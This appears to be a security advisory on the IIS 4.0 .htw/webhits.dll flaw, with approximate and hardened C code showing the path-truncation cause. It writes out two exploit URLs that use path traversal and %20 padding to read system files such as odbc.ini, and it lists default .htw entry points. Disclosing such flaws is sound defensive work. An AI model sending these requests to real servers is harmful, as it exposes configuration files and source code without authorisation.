Affected programs:
Microsoft Internet Information Server / Index Server
Description:
Shocking security discovery: new vulnerabilities allow viewing of any file on the web server, including ASP source
Details:
IIS 4.0 has an application mapping .htw ---> webhits.dll, which is used for the hit-highlighting function of Index Server. Even if you are not running Index Server, the mapping still takes effect. This application mapping has vulnerabilities that allow intruders to read files on local hard drives, database files, and ASP source code!
There are two ways to do this. First, if a file with an .htw suffix exists on your web server, the contents of a file can be viewed as follows, for example the contents of the odbc.ini file:
http://www.xxx.com/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/odbc.ini&cirestriction=none&cihilitetype=full
In a typical IIS installation, .htw files can be found in the following locations:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw
Second, if no such file exists on your web server, a vulnerable system still allows the user to invoke webhits.dll, as follows:
http://www.xxx.com/default.htm%20%20%20%20%20.htw?ciwebhitsfile=/../../winnt/odbc.ini&cirestriction=none&cihilitetype=full
The condition is that default.htm must exist. Another file name can be used instead, but that file must exist. webhits.dll will open the file as a temporary file. When the number of %20 spaces in the URL reaches a certain number, the web service's identification function may go wrong, so that webhits.dll opens the specified file \winnt\odbc.ini. If this succeeds, more files, including ASP code, can be opened in the same way. The following code shows the approximate principle:
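#include <stdio.h>
#include <stdlib.h>
#include <string.h>

FILE *fd;

int doestemplateexist(char *pathtohtwfile)
{
    // Just in case inetinfo.exe passes too long a string
    // let's make sure it's of a suitable length and not
    // going to open a buffer overrun vulnerability
    char *file;
    file = (char *) malloc(251);
    if (file == NULL)
        return 0;
    // Only the first 250 characters are kept; anything after them,
    // such as a trailing suffix, is silently dropped
    strncpy(file, pathtohtwfile, 250);
    file[250] = '\0';   // strncpy does not terminate a truncated copy
    fd = fopen(file, "r");
    free(file);
    // Success
    if (fd != NULL)
    {
        return 1;
    }
    // Failed
    else
    {
        return 0;
    }
}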
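The truncation in the approximate code above, worked through as an added example (not code from the original advisory or from Microsoft): the extension is tested on the full path, while the name that gets opened is the truncated copy. The function names, the constructed sample path and the trailing-space stripping (standing in for Win32 file-name handling) are assumptions of this example; checked_name shows the hardened pattern of rejecting over-long input instead of truncating it.

```c
#include <stdio.h>
#include <string.h>

#define TEMPLATE_MAX 250   /* copy limit taken from the page's approximate code */

/* Extension test on the full request path, as the script mapping sees it. */
int has_htw_suffix(const char *path)
{
    size_t n = strlen(path);
    return n >= 4 && strcmp(path + n - 4, ".htw") == 0;
}

/* Flawed pattern: truncate silently, then use the shortened name (out: TEMPLATE_MAX + 1 bytes). */
void truncated_name(const char *path, char *out)
{
    size_t n;
    strncpy(out, path, TEMPLATE_MAX);
    out[TEMPLATE_MAX] = '\0';
    /* Assumption: the file API ignores trailing spaces, as Win32 does. */
    for (n = strlen(out); n > 0 && out[n - 1] == ' '; n--)
        out[n - 1] = '\0';
}

/* Hardened pattern: reject over-long input instead of truncating, and
   re-check the suffix on the exact string that will be opened. */
int checked_name(const char *path, char *out)
{
    if (strlen(path) > TEMPLATE_MAX)
        return 0;
    strcpy(out, path);
    return has_htw_suffix(out);
}

/* Constructed sample input: "default.htm" + pad spaces + ".htw" (buf: 11 + pad + 5 bytes). */
void build_padded(char *buf, size_t pad)
{
    strcpy(buf, "default.htm");
    memset(buf + 11, ' ', pad);
    strcpy(buf + 11 + pad, ".htw");
}

int main(void)
{
    char req[512], opened[TEMPLATE_MAX + 1], tmp[TEMPLATE_MAX + 1];
    build_padded(req, 300);
    truncated_name(req, opened);
    printf("mapped as .htw: %d, opened: \"%s\", hardened accepts: %d\n", has_htw_suffix(req), opened, checked_name(req, tmp));
    return 0;
}
```

With the padded sample the suffix test passes on the request while the truncated copy names default.htm, which is the mismatch a length check before any copy removes.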